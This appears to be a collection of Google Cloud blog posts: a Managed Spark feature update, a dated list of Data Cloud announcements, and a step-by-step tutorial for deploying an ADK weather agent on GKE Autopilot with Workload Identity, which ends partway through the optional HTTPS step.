Arguably the biggest update for Managed Spark clusters is Lightning Engine, which introduces massive performance gains for Spark DataFrame/Dataset APIs and heavy Spark SQL queries. Powered by a native, C++ vectorized execution engine built on Velox and Gluten, with specialized internal enhancements, Lightning Engine bypasses JVM execution bottlenecks by compiling query plans into native instructions optimized for SIMD (Single Instruction, Multiple Data) vectorization.

This native execution engine delivers:

Up to 4.9x faster performance than standard open-source Spark
Up to 2x the price-performance of the leading high-speed Spark alternative

Crucially, taking advantage of these performance gains doesn’t require any code changes to your existing Spark applications. Because your jobs complete faster, you directly reduce your aggregate Compute Engine runtime hours and overall spend.
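As a rough worked example of the runtime claim, assume a job that takes 10 hours on standard open-source Spark and achieves the best-case speedup of s = 4.9 quoted above. Real gains depend on the workload, and this arithmetic covers runtime hours only, not any pricing differences between configurations.

```latex
T_{\text{new}} = \frac{T_{\text{old}}}{s} = \frac{10\,\text{h}}{4.9} \approx 2.04\,\text{h},
\qquad
1 - \frac{1}{s} = 1 - \frac{1}{4.9} \approx 0.796
```

In this best case, the job would consume roughly 80% fewer Compute Engine runtime hours.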

To enable Lightning Engine on your managed clusters, simply specify the Lightning Engine option when you’re creating a cluster.

Learn technical details and hear Lowe’s experience with Lightning Engine

Easier: Maximize resource obtainability via Flexible VMs

Temporary localized shortages of a specific machine type can stall cluster creation or interrupt autoscaling. To dramatically improve cluster resilience against capacity constraints, Flexible VMs for Managed Spark clusters are now generally available.

Flexible VMs allow you to define up to ten ranked machine types for your master, primary, and secondary worker nodes. Managed Service for Apache Spark pairs this preference with automated regional zone placement, dynamically scanning the entire region to fulfill your capacity requests using the best available hardware layout. This helps ensure your pipelines spin up predictably, drastically reducing resource availability errors, and maximizing your ability to capture cost-effective Spot VM capacity during periods of peak demand.
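The service's actual placement logic is not described beyond the paragraph above, but the core idea of a ranked fallback can be sketched: walk the machine types in preference order and, for each one, look for a zone in the region with enough capacity. The Python below is a simplified model under that assumption. The capacity map is a hypothetical stand-in for live availability, the machine type and zone names are example inputs, and the real service weighs factors this sketch ignores.

```python
from typing import Dict, List, Optional, Tuple

MAX_RANKED_TYPES = 10  # the post states up to ten ranked machine types


def pick_placement(
    ranked_types: List[str],
    capacity: Dict[str, Dict[str, int]],
    nodes_needed: int,
) -> Optional[Tuple[str, str]]:
    """Return (machine_type, zone) for the most preferred machine type that
    some zone can supply for all requested nodes, or None if none can.

    capacity maps zone -> {machine_type: available_count} (hypothetical input).
    """
    if len(ranked_types) > MAX_RANKED_TYPES:
        raise ValueError("at most ten ranked machine types are allowed")
    for machine_type in ranked_types:  # preference order
        for zone in sorted(capacity):  # deterministic scan across the region
            if capacity[zone].get(machine_type, 0) >= nodes_needed:
                return machine_type, zone
    return None
```

Trying every zone for the top-ranked type before falling back to the next type keeps the preferred hardware whenever the region has it anywhere.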

Easier: Zero-scale clusters and scheduled stops

To give you better fiscal control over persistent and developmental environments, we recently announced the general availability of two highly requested FinOps features: zero-scale clusters and cluster scheduled stops.

Zero-scale clusters: You can now provision environments that use exclusively secondary workers (Spot VMs), enabling the cluster to automatically scale down to absolutely zero worker nodes when no processing is active, leaving only the master node online to preserve metadata.
Cluster scheduled stops: This feature lets you configure automated cluster shutdown policies based on specific idle-time limits or a precise future timestamp.

Because these features are natively integrated, they remove the operational friction of deleting and recreating your environment while letting you stop paying for idle compute overhead during nights and weekends.
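The two stop conditions described above, an idle-time limit and a precise future timestamp, can be modeled as a single check. The Python sketch below is a hypothetical illustration of that decision, not the service's implementation; in practice you configure the policy on the cluster and the service evaluates it for you.

```python
from datetime import datetime, timedelta, timezone
from typing import Optional


def should_stop(
    now: datetime,
    last_activity: datetime,
    idle_limit: Optional[timedelta] = None,
    stop_at: Optional[datetime] = None,
) -> bool:
    """Return True if either configured stop condition has been met.

    idle_limit: stop after this much time without job activity.
    stop_at: stop at or after this absolute (timezone-aware) time.
    """
    idle_expired = idle_limit is not None and now - last_activity >= idle_limit
    deadline_reached = stop_at is not None and now >= stop_at
    return idle_expired or deadline_reached


# Usage: a cluster idle for three hours against a two-hour limit.
now = datetime(2026, 6, 5, 22, 0, tzinfo=timezone.utc)
print(should_stop(now, now - timedelta(hours=3), idle_limit=timedelta(hours=2)))  # True
```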

Smarter: Managed Service for Apache Spark MCP Server

To bridge the gap between generative AI and data engineering, we launched the Model Context Protocol (MCP) server for Managed Service for Apache Spark. This open-standard integration allows LLMs and AI assistants to securely and dynamically interact with your Managed Spark clusters using natural language.

By utilizing the MCP server, your AI agents can securely connect to your data platform under existing IAM permissions. This allows agents to perform cluster-based operations, such as creating a cluster, submitting a job, or adjusting an autoscaling policy, directly from your AI application.
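MCP messages use JSON-RPC 2.0, and a client invokes a server tool with the `tools/call` method, passing the tool `name` and its `arguments`. The Python sketch below builds such a request for submitting a job. The tool name `submit_job` and its argument names are hypothetical placeholders, since the server's actual tool list is not given here; a real client would discover tools with `tools/list` first, and transport and authentication are omitted.

```python
import itertools
import json

_ids = itertools.count(1)  # a client must not reuse request ids within a session


def tools_call(name: str, arguments: dict) -> str:
    """Serialize an MCP tools/call request as a JSON-RPC 2.0 message."""
    message = {
        "jsonrpc": "2.0",
        "id": next(_ids),
        "method": "tools/call",
        "params": {"name": name, "arguments": arguments},
    }
    return json.dumps(message)


# Hypothetical tool and argument names; discover the real ones with tools/list.
request = tools_call(
    "submit_job",
    {
        "cluster": "my-optimized-cluster",
        "region": "us-central1",
        "main_python_file_uri": "gs://example-bucket/etl.py",
    },
)
print(request)
```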

Smarter: Accelerating AI with the Data Agent Kit

The Google Cloud Data Agent Kit extension allows data scientists, engineers, and developers to manage their entire data workload lifecycle directly within their preferred development environment. We rolled out native support for this extension on Managed Spark clusters, enabling teams to seamlessly build and deploy specialized Data Agents for code generation and data wrangling.

Developers can choose to use Antigravity 2.0, Google's standalone, agentic development platform, or bring these agentic capabilities into their preferred IDE, including VS Code, Claude Code, or Codex, via the Data Agent Kit extensions and plugins. By pairing this streamlined workflow with the raw processing power of managed clusters, these intelligent agents can securely execute complex workflows directly over petabyte-scale data lakes. Specifically, the Data Agent Kit enables developers to:

Build and orchestrate pipelines: Author multi-node data pipelines and generate comprehensive code documentation using natural language.
Perform real-time debugging: Leverage Gemini Cloud Assist to sift through executor logs, pinpoint root causes of job failures, and recommend actionable fixes.
Easily connect to Spark resources: Instantly attach to serverless Spark runtimes or managed clusters without manual network configuration or local Spark installations.
Streamline Git and CI/CD management: Commit, merge, and deploy code directly from your IDE of choice, triggering automated testing and deployment pipelines without friction.

Smarter: Next-generation Lakehouse

We recently launched Lakehouse, which delivers read/write interoperability between engines like Managed Service for Apache Spark and BigQuery. By leveraging the Lakehouse runtime catalog as a unified, serverless metadata layer, it removes data silos and the need for complex translation layers. This agentic-first approach allows organizations to process open formats directly from Google Cloud Storage, or even query remote AWS datasets using the newly introduced cross-cloud Lakehouse, all while maintaining a single source of truth for security and governance.

For customers utilizing Managed Spark clusters, this integration unlocks several powerful new capabilities. Data teams can now accelerate their most demanding ETL and data science workloads by up to 4.9x using the optimized Lightning Engine.

Next-gen runtimes: Cluster Image 3.0 with Spark 4.1

Keeping pace with the open-source ecosystem, we rolled out Cluster Image 3.0 in preview, built on Apache Spark 4.1 and featuring an upgraded default Java runtime, Java 21. Spark 4.1 introduces a set of core open-source capabilities, including real-time mode for Structured Streaming, which enables continuous streaming with sub-second latency in your Spark environment.

Get started today

These updates are live and ready to use today in Managed Spark clusters! You can enable these new features directly through the Google Cloud console or via the gcloud CLI.

To spin up a new Managed Cluster with the performance of Lightning Engine enabled natively, run the following command in your terminal:

```
gcloud dataproc clusters create my-optimized-cluster \
  --region=us-central1 \
  --image-version=2.3 \
  --engine=lightning
```

Alternatively, navigate to the Managed Service for Apache Spark page in the console, click Create cluster, and select ‘Enable Lightning Engine’ under the cluster configuration settings to automatically activate Lightning Engine for your Spark jobs.

We look forward to hearing about the environments you build and run on Managed Service for Apache Spark clusters!

What’s new with Google Data Cloud

Thu, 04 Jun 2026 16:00:00 +0000

June 1 - June 5

Beyond the Query: Powering AI Agents with Bigtable, Firestore & Memorystore
Discover the latest advancements in Google Cloud's NoSQL Database portfolio, including Bigtable, Firestore, and Memorystore. This series is designed for a broad audience: whether you are exploring these databases for the first time or are an existing user looking to leverage the new capabilities announced at Next '26.

Register here to secure your spot!

Cloud Engineer's AI Toolkit Workshops: Solve data-driven challenges with BigQuery, AlloyDB, Gemini, and more. Hosted by Google Cloud Labs, this highly technical event is built specifically for platform engineers, SREs, and cloud infrastructure teams ready to bridge the gap between AI prototypes and production-grade deployments. More locations are coming soon.

Toronto - June 25 (Data Cloud) | RSVP Here
Chicago - June 30 (Data Cloud) | RSVP Here
Start a 10-day Bigtable free trial with a 1-node SSD cluster and up to 500 GB of storage capacity. No credit card is required to start, so you can easily ingest and manage workloads that require low-latency, high-throughput, and predictable access. Plus, new Google Cloud customers get $300 in free credits on signup.

May 11 - May 15

Managed Service for Apache Airflow has launched a wave of new features, including the general availability of Airflow 3.1, AI-powered agentic troubleshooting, a new managed Airflow MCP Server for custom agent integration, and declarative YAML-based orchestration pipelines—discover all the details in the full blog post.

April 20 - April 24

Google-built ODBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built ODBC driver for BigQuery. This open-source driver provides a direct, high-performance connection from applications to BigQuery and is developed entirely in-house by Google. Download the new driver and connect your application to BigQuery.

April 13 - April 17

We announced we are reintroducing Data Studio to play a significant role in the AI era, expanding from data visualizations and reports to host BigQuery conversational agents and data apps built in Colab notebooks.
We announced BigQuery Graph is now available in preview, offering an easy-to-use, highly scalable graph analytics solution, empowering data professionals to model, analyze and visualize massive-scale relationships in an entirely new way.

April 6 - April 10

We introduced Conversational Analytics for Looker Embedded environments, enabling users to add natural language experiences to their own custom data-driven applications, powered by Gemini.
We expanded Looker’s capabilities for faster ad-hoc analysis, with the introduction of self-service Explores, enabling you to bring your own data to Looker’s semantic layer and gain instant access to insights in a governed data environment.

March 23 - March 27

We showed you how you can scale your reads with Cloud SQL autoscaling read pools. This feature allows you to provision multiple read replicas that are accessible via a single read endpoint and to dynamically adjust your read capability based on real-time application needs.
Our customers are leveraging the full power of Conversational Analytics and Looker to drive major business and technical breakthroughs in the AI era. Companies like Telenor, Pet Circle, Fluent Commerce, Lighthouse Intelligence, Wego, and ROLLER are turning data into insights and actions, grounded by Looker’s semantic layer.

March 16 - March 20

We introduced an enhanced Gemini assistant in BigQuery Studio, transforming the agent from a code assistant into a fully context-aware analytics partner.

February 23 - February 27

We introduced managed and remote MCP support for Google Cloud databases, including AlloyDB, Spanner, Cloud SQL, Bigtable and Firestore, to power the next generation of agents. This announcement extends the ability for AI models to plan, build, and solve complex problems, connecting to the database tools our customers leverage daily as the backbone of their work environment.
We outlined how you can use the Conversational Analytics API to build context-aware conversational agents in BigQuery that understand natural language, query your BigQuery data, and deliver answers in text, tables, and visual charts.

February 16 - February 20

Our customers are leveraging the full power of Looker to drive major business and technical breakthroughs. Companies like Arrive, Audika, Carousell, Framebridge, GumGum, Intel, Overdose Digital, Ocean Network Express, Subskribe and Promevo are leveraging Looker’s newest AI-driven capabilities, including Conversational Analytics, to transform data into insights and actions and to empower their entire organization with a single source of truth, powered by Looker’s semantic layer.

February 2 - February 6

Join us on March 4 for our webinar, Win Your AI Strategy with Cloud SQL Enterprise Plus, to learn how to power your generative AI workloads with 3x higher performance and 99.99% availability. Register today to discover how to build a scalable, enterprise-grade foundation for your most demanding AI applications.

January 26 - January 30

We introduced Conversational Analytics in BigQuery, which allows users to analyze data using natural language. Conversational Analytics in BigQuery is an intelligent agent that generates, executes and visualizes answers grounded in your business context directly in BigQuery Studio, making data insights for data professionals more conversational.
We outlined how data products have become the foundation for AI agents, providing the context needed to make autonomous agents reliable and trusted for real business use, backed by organized business logic and semantic understanding.
We highlighted how you can supercharge data analytics workflows, and outlined Google Cloud’s AI agent offerings for data engineering, data science, and development tools, so you can integrate agentic workflows in your applications, empower your teams and speed discovery.

January 19 - January 23

We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.
Introducing Google Cloud SQL on MSSQLTips: We are highlighting a new technical guide published on MSSQLTips titled "Introducing Google Cloud SQL." This article serves as an essential resource for SQL Server administrators and developers exploring Google Cloud's fully managed database service. It provides a detailed overview of Cloud SQL capabilities, including high availability, security integration, and the seamless transition of on-premises SQL Server workloads to the cloud, making it an ideal resource for those planning their migration strategy.
We are excited to announce the Public Preview of Microsoft Entra ID (formerly Azure Active Directory) integration with Cloud SQL for SQL Server. Designed to tackle the challenge of identity sprawl in multi-cloud environments, this integration allows organizations to govern database access using their existing Microsoft identity infrastructure. Key benefits include centralized identity management, enhanced security features like Multi-Factor Authentication (MFA), and simplified user administration through direct group mapping. This feature is available for SQL Server 2022 and supports both public and private IP configurations.

January 12 - January 16

Google-built JDBC Driver for BigQuery is now available in Preview
We are excited to announce the launch of the new, Google-built JDBC driver for BigQuery. This open-source driver provides a direct, high-performance connection from Java applications to BigQuery and is developed entirely in-house by Google. Download the new driver and connect your Java application to BigQuery.
Troubleshoot Airflow tasks instantly with Gemini Cloud Assist investigations: Cloud Composer just got smarter. We are excited to announce that Gemini Cloud Assist investigations are now available directly within Cloud Composer 3. Instead of manually sifting through raw logs, you can now simply click "Investigate" on a failed Airflow task. Gemini analyzes logs and task metadata to identify failure patterns—such as resource exhaustion or timeouts—and provides actionable recommendations driven by Gemini Cloud Assist to resolve the issue. This integration shifts the debugging experience from manual toil to automated root cause analysis, significantly reducing the time required to restore your pipelines. Learn more about AI-assisted troubleshooting.

Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot

Thu, 04 Jun 2026 07:00:00 +0000

While building AI agents locally using Google’s Agent Development Kit (ADK) is an excellent way to prototype, production-ready agents require a robust, scalable infrastructure. For developers looking to move beyond simple instances and into the world of managed container orchestration, Google Kubernetes Engine (GKE) Autopilot offers the perfect balance of flexibility and ease of use.

In this tutorial, I will walk you through building a technical agent with ADK and deploying it to GKE Autopilot. We will use Gemini on Vertex AI as the core model and follow security best practices by using Workload Identity, rather than API keys, for permission management.

Understanding the GKE ADK Architecture

Deploying an ADK agent on GKE Autopilot involves more than just running a container. We leverage GKE's native capabilities to handle scaling and security. Our architecture consists of an ADK-based Python application packaged as a Docker image and stored in Artifact Registry. This container runs as a Deployment on GKE Autopilot, where it communicates securely with Vertex AI using Workload Identity—mapping a Kubernetes Service Account to a Google Cloud IAM Service Account.

To expose the agent to the world, we use the Kubernetes Gateway API, the modern successor to Ingress, which provides a cleaner separation of concerns and native support for Google Cloud Load Balancing.

Prerequisites

Before we begin, ensure you have the following tools and accounts ready:

Python 3.10 or higher.
uv for package management.
Google Cloud SDK (gcloud) installed and configured.
A Google Cloud project with billing enabled.
kubectl command-line tool.
jq for parsing JSON responses.
The following APIs enabled: Kubernetes Engine, Artifact Registry, and Vertex AI.

Step 0: Configuring Google Cloud and Authentication

Before interacting with Google Cloud services, you must authenticate your environment and set the active project. This ensures that both the gcloud CLI and your local Python environment can access Vertex AI.

Log in to the Google Cloud SDK:
```
gcloud auth login
```
Set your active project:
```
gcloud config set project [PROJECT_ID]
```
Set up Application Default Credentials (ADC): this is crucial for the ADK library to authenticate with Vertex AI during local testing.
```
gcloud auth application-default login
```
Define Environment Variables: To ensure we can easily reuse our configuration in subsequent steps, let's export our project, region, and cluster name as environment variables.
```
export PROJECT_ID=$(gcloud config get-value project)
export REGION=us-central1
export CLUSTER_NAME=adk-cluster
```

Step 1: Provisioning GKE Autopilot

GKE Autopilot is the recommended way to run Kubernetes without managing nodes. It allows you to focus on your agent deployment while Google manages the infrastructure. Starting the cluster creation now allows it to provision in the background while we build the agent.

```
gcloud container clusters create-auto $CLUSTER_NAME --region $REGION
```

While the cluster is provisioning, we can move on to building our agent.

Step 2: Building the Agent with ADK

First, let's create our agent. Start by creating a folder for the agent code:

```
mkdir adk-agent
cd adk-agent
```

Initialize a new Python project with uv:

```
uv init
```

Add the ADK dependency:

```
uv add google-adk
```

Create a new agent using the ADK CLI:

```
uv run adk create weather_agent
```

You will be prompted for a few settings. For the root agent's model, choose gemini-2.5-flash (option 1). For the backend, choose Vertex AI (option 2). Then enter your Google Cloud project ID and a region, for example us-central1.

The previous command scaffolded a new directory weather_agent with the following structure:

```
weather_agent/
├── .env
├── __init__.py
└── agent.py
```

ADK expects the agent to be defined in agent.py. Let's edit agent.py to add a simple tool for the agent:

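```
from google.adk import Agent


# Define a simple tool for the agent. ADK builds the tool description
# from the function name, type hints, and docstring.
def get_weather(city: str) -> str:
    """Returns the current weather in a city."""
    return f"The weather in {city} is 90 degrees Fahrenheit and sunny."


# ADK loads the agent from the module-level `root_agent` variable.
# The Vertex AI backend, project, and region come from the .env file
# generated by `adk create`.
root_agent = Agent(
    name="weather_agent",
    model="gemini-2.5-flash",
    tools=[get_weather],
)
```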

The agent.py file is the entry point for the agent. It is used to define the agent and its tools. The get_weather function is a simple tool that returns the current weather in a city. For the purpose of this tutorial, we are using a hardcoded value for the weather. In a real-world scenario, you would use an API to get the current weather.
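
As a sketch of the next step toward a real tool, the hypothetical variant below looks the city up in a small in-memory table (a stand-in for a real weather API, which is not shown) and returns a dictionary with a `status` field, the pattern the ADK quickstart uses so the model can tell success from failure. The `get_weather_report` name and the table contents are illustrative assumptions, not part of this tutorial's agent.

```python
# Hypothetical stand-in for a real weather API: city -> (temp_f, conditions).
_FAKE_WEATHER = {
    "new york": (90, "sunny"),
    "london": (64, "cloudy"),
}


def get_weather_report(city: str) -> dict:
    """Returns the current weather for a city.

    Args:
        city: Name of the city, e.g. "New York".

    Returns:
        A dict with "status" set to "success" plus a "report", or
        "status" set to "error" plus an "error_message".
    """
    key = city.strip().lower()  # normalize so "New York " matches "new york"
    if key not in _FAKE_WEATHER:
        return {
            "status": "error",
            "error_message": f"No weather data available for {city!r}.",
        }
    temp_f, conditions = _FAKE_WEATHER[key]
    return {
        "status": "success",
        "report": f"The weather in {city.strip()} is {temp_f} degrees Fahrenheit and {conditions}.",
    }


if __name__ == "__main__":
    print(get_weather_report("New York"))
    print(get_weather_report("Atlantis"))
```

To try it, pass `tools=[get_weather_report]` when constructing the `Agent`; because ADK derives the tool description from the signature and docstring, the docstring is worth keeping precise.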

Step 3: Testing the Agent Locally

Before deploying the agent to GKE Autopilot, test it locally to make sure it works as expected. From the adk-agent directory, run the following command to start the agent with the ADK development web UI:

```
uv run adk web
```

Open http://localhost:8000 in your browser and you should see the ADK web UI. You can then interact with your agent by typing messages in the chat interface.

If the agent replies with something like "The weather in [CITY] is 90 degrees Fahrenheit and sunny.", congratulations: your ADK agent is working, and you can proceed to the next step.

Step 4: Preparing for GKE Autopilot

The ADK CLI has a built-in command to deploy the agent to GKE Autopilot. However, its default settings are not suitable for a production environment: for example, they do not use Workload Identity to authenticate with Vertex AI, and they expose the web UI through a load balancer on port 80.

We will instead manage the lifecycle of the container ourselves. First we need to containerize the agent.

Create a .dockerignore file in the adk-agent directory to prevent your local virtual environment from being copied into the image:

```
.venv
.adk
__pycache__
*.pyc
.env
```

Create a Dockerfile for your agent in the adk-agent directory. We will use a multi-stage build to keep the final production image lightweight and secure:

# Stage 1: Build the virtual environment
FROM python:3.10-slim AS builder

# Install uv
COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/

# Set working directory
WORKDIR /app

# Force uv to use the system Python and use copy instead of symlinks
ENV UV_PYTHON_PREFERENCE=only-system
ENV UV_LINK_MODE=copy
ENV UV_COMPILE_BYTECODE=1
ENV UV_PYTHON=/usr/local/bin/python3

# Install dependencies
# We copy only files needed for installation to maximize cache
COPY pyproject.toml uv.lock ./
# Note: We don't use --frozen yet as the host lock file might be slightly out of sync
# but sync will update it in the builder stage.
RUN uv sync --no-install-project --no-dev --no-cache

# Copy the agent code
COPY . .
# Sync the project itself
RUN uv sync --no-dev --no-cache

# Stage 2: Runtime image
FROM python:3.10-slim

WORKDIR /app

# Copy the pre-built environment from the builder
COPY --from=builder /app/.venv /app/.venv
# Copy the application code (including weather_agent folder)
COPY . .

# Add the environment to the PATH
ENV PATH="/app/.venv/bin:$PATH"
ENV PYTHONUNBUFFERED=1

# Run the ADK API server
# We point to the weather_agent folder
CMD ["adk", "api_server", ".", "--host", "0.0.0.0", "--port", "8080"]

Build and push the image to Artifact Registry:

```
# Create repository
gcloud artifacts repositories create adk-repo --repository-format=docker --location=$REGION

# Build and push
gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
```

Step 5: Implementing Workload Identity for Security

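Security is paramount. Instead of hardcoding API keys, we use Workload Identity to grant the GKE pods permission to access Vertex AI. GKE Autopilot clusters have Workload Identity Federation for GKE enabled by default, so no extra cluster configuration is needed.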

1. Create an IAM Service Account:

```
gcloud iam service-accounts create adk-gke-sa
```

2. Grant Vertex AI permissions:

```
gcloud projects add-iam-policy-binding $PROJECT_ID \
    --member="serviceAccount:adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/aiplatform.user"
```

3. Allow the Kubernetes Service Account to impersonate the IAM SA:

```
gcloud iam service-accounts add-iam-policy-binding adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com \
    --role="roles/iam.workloadIdentityUser" \
    --member="serviceAccount:$PROJECT_ID.svc.id.goog[default/adk-ksa]"
```
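
The commands in this step and the next wire together names that follow fixed patterns: the IAM service account email, the Workload Identity principal `serviceAccount:PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME]`, and the Artifact Registry image path. A typo in any of them usually surfaces later as a permission or image-pull error. The sketch below derives all three from the project and region; `WorkloadIdentityNames` is a hypothetical helper for this tutorial, not part of any Google Cloud SDK, and its defaults are the names used above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class WorkloadIdentityNames:
    """Names used in Steps 4-6 (hypothetical helper, not a Google Cloud API)."""

    project_id: str
    region: str
    gsa_name: str = "adk-gke-sa"  # IAM service account created above
    ksa_name: str = "adk-ksa"  # Kubernetes ServiceAccount in deployment.yaml
    namespace: str = "default"
    repo: str = "adk-repo"
    image: str = "gke-agent:latest"

    @property
    def gsa_email(self) -> str:
        # IAM service account emails follow NAME@PROJECT_ID.iam.gserviceaccount.com
        return f"{self.gsa_name}@{self.project_id}.iam.gserviceaccount.com"

    @property
    def wi_member(self) -> str:
        # Principal granted roles/iam.workloadIdentityUser on the IAM service account
        return f"serviceAccount:{self.project_id}.svc.id.goog[{self.namespace}/{self.ksa_name}]"

    @property
    def image_uri(self) -> str:
        # Artifact Registry Docker path: REGION-docker.pkg.dev/PROJECT/REPO/IMAGE
        return f"{self.region}-docker.pkg.dev/{self.project_id}/{self.repo}/{self.image}"


if __name__ == "__main__":
    names = WorkloadIdentityNames(project_id="my-project", region="us-central1")
    print(names.gsa_email)
    print(names.wi_member)
    print(names.image_uri)
```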

Step 6: Deploying the Agent to GKE

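Now, define the Kubernetes resources. Create a deployment.yaml that includes the Service Account annotation for Workload Identity. kubectl does not expand shell variables, so replace $PROJECT_ID and $REGION with your actual project ID and region before applying the file (for example, by rendering it with envsubst).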

apiVersion: v1
kind: ServiceAccount
metadata:
  name: adk-ksa
  annotations:
    iam.gke.io/gcp-service-account: adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: adk-agent
spec:
  replicas: 2
  selector:
    matchLabels:
      app: adk-agent
  template:
    metadata:
      labels:
        app: adk-agent
    spec:
      serviceAccountName: adk-ksa
      containers:
      - name: adk-agent
        image: $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits: 
            cpu: "1"
            memory: "1Gi"
        ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: adk-service
spec:
  selector:
    app: adk-agent
  ports:
  - port: 80
    targetPort: 8080
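
kubectl applies the manifest exactly as written, so the `$PROJECT_ID` and `$REGION` placeholders must be filled in first. As an alternative to hand-editing, Python's standard `string.Template` uses the same `$NAME` placeholder syntax as this file. A minimal sketch; `render_manifest` and `render_file` are our own helper names, and the output file name in the usage note is an arbitrary choice.

```python
from string import Template


def render_manifest(text: str, project_id: str, region: str) -> str:
    """Replaces the $PROJECT_ID and $REGION placeholders in a manifest.

    Template.substitute() raises KeyError if the text contains any other
    $NAME placeholder, so a mistyped placeholder fails loudly instead of
    reaching the cluster.
    """
    return Template(text).substitute(PROJECT_ID=project_id, REGION=region)


def render_file(src_path: str, dst_path: str, project_id: str, region: str) -> None:
    """Reads a manifest template from src_path and writes the rendered copy to dst_path."""
    with open(src_path, encoding="utf-8") as src:
        rendered = render_manifest(src.read(), project_id, region)
    with open(dst_path, "w", encoding="utf-8") as dst:
        dst.write(rendered)
```

For example, `render_file("deployment.yaml", "deployment.rendered.yaml", os.environ["PROJECT_ID"], os.environ["REGION"])` reuses the variables exported in Step 0; you would then apply `deployment.rendered.yaml` instead of the template.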

Apply the configuration:

```
kubectl apply -f deployment.yaml
```

Check the status of the deployment:

```
kubectl get pods -w
```

Once the pods are running, you can use kubectl port-forward to access the agent locally:

```
kubectl port-forward svc/adk-service 8080:80
```

Because the container runs adk api_server rather than adk web, there is no web UI at http://localhost:8080. You can still interact with the agent through its REST API using curl.

In a new terminal, run the following commands:

```
# Create a new session
curl -X POST http://localhost:8080/apps/weather_agent/users/u_123/sessions/s_123

# Run a message
curl -s -X POST http://localhost:8080/run \
  -H "Content-Type: application/json" \
  -d '{
    "appName": "weather_agent",
    "userId": "u_123",
    "sessionId": "s_123",
    "newMessage": {
      "role": "user",
      "parts": [{"text": "Hey whats the weather in new york today"}]
    }
  }' | jq .
```
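
The same two calls can be made from Python using only the standard library. A minimal sketch, assuming the port-forward above is running on localhost:8080 and the request body shown in the curl example; `create_session`, `run_message`, and `build_run_payload` are our own helper names, not part of ADK. Nothing is sent until you call the functions.

```python
import json
import urllib.request
from typing import Any, Dict, Optional

BASE_URL = "http://localhost:8080"  # local end of the kubectl port-forward


def build_run_payload(app: str, user: str, session: str, text: str) -> Dict[str, Any]:
    """Builds the same /run request body as the curl example."""
    return {
        "appName": app,
        "userId": user,
        "sessionId": session,
        "newMessage": {"role": "user", "parts": [{"text": text}]},
    }


def _post_json(url: str, body: Optional[Dict[str, Any]] = None) -> Any:
    """Sends a POST (with a JSON body if given) and decodes the JSON response."""
    data, headers = None, {}
    if body is not None:
        data = json.dumps(body).encode("utf-8")
        headers["Content-Type"] = "application/json"
    req = urllib.request.Request(url, data=data, headers=headers, method="POST")
    # Model calls can take several seconds, so allow a generous timeout.
    with urllib.request.urlopen(req, timeout=120) as resp:
        return json.loads(resp.read().decode("utf-8"))


def create_session(app: str, user: str, session: str, base_url: str = BASE_URL) -> Any:
    # Equivalent to: curl -X POST BASE_URL/apps/APP/users/USER/sessions/SESSION
    return _post_json(f"{base_url}/apps/{app}/users/{user}/sessions/{session}")


def run_message(app: str, user: str, session: str, text: str, base_url: str = BASE_URL) -> Any:
    # Equivalent to the curl call against /run
    return _post_json(f"{base_url}/run", build_run_payload(app, user, session, text))
```

For example, call `create_session("weather_agent", "u_123", "s_123")` once, then `run_message("weather_agent", "u_123", "s_123", "What's the weather in New York?")`. Non-2xx responses raise `urllib.error.HTTPError`.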

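The curl command returns JSON, and jq pretty-prints it. The /run endpoint returns the list of events produced during the turn rather than a single message: typically the model's call to get_weather, the tool's response, and the model's final reply. An abbreviated response (most fields trimmed; exact contents and wording will vary) looks like:

```
[
  {
    "author": "weather_agent",
    "content": {
      "role": "model",
      "parts": [{"functionCall": {"name": "get_weather", "args": {"city": "New York"}}}]
    }
  },
  {
    "author": "weather_agent",
    "content": {
      "role": "user",
      "parts": [{"functionResponse": {"name": "get_weather", "response": {"result": "The weather in New York is 90 degrees Fahrenheit and sunny."}}}]
    }
  },
  {
    "author": "weather_agent",
    "content": {
      "role": "model",
      "parts": [{"text": "The weather in New York today is sunny with a high of 90 degrees Fahrenheit."}]
    }
  }
]
```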
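
When scripting against /run, you usually want only the agent's final text. A minimal sketch, assuming the response is a JSON array of ADK events in which each event may carry `content.parts`, and only text parts have a `text` key (function-call and function-response parts do not); check this shape against the ADK version you deploy. `final_text` is our own helper name.

```python
from typing import Any, Dict, List, Optional


def final_text(events: List[Dict[str, Any]]) -> Optional[str]:
    """Returns the joined text of the last event that has text parts, or None.

    Walks the events from newest to oldest; parts holding functionCall or
    functionResponse have no "text" key and are skipped.
    """
    for event in reversed(events):
        parts = (event.get("content") or {}).get("parts") or []
        texts = [p["text"] for p in parts if isinstance(p, dict) and p.get("text")]
        if texts:
            return "".join(texts)
    return None
```

Pass it the decoded response body, for example `final_text(json.loads(body))`.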

(Optional) Step 7: Exposing via Gateway API and HTTPS load balancer

Finally, we expose the agent using the GKE Gateway API with a Google-managed TLS certificate. This is the recommended, production-grade approach — Google will automatically provision and renew the certificate for your domain.

NB: GKE supports other options to provision certificates. You can use Let's Encrypt with cert-manager, pre-shared certificates, or any other certificate authority. You can check the GKE documentation for more details.

First, reserve a static IP address for your load balancer:

```
gcloud compute addresses create adk-agent-ip --global
export AGENT_IP=$(gcloud compute addresses describe adk-agent-ip --global --format="value(address)")
echo "Your IP: $AGENT_IP"
```

Point your domain's DNS A record at $AGENT_IP. This tutorial uses api.yourdomain.com as the example hostname, matching the HTTPRoute below.

Create a Google-managed certificate for the same hostname, replacing api.yourdomain.com with your actual domain:

```
gcloud compute ssl-certificates create adk-cert --domains api.yourdomain.com --global
```
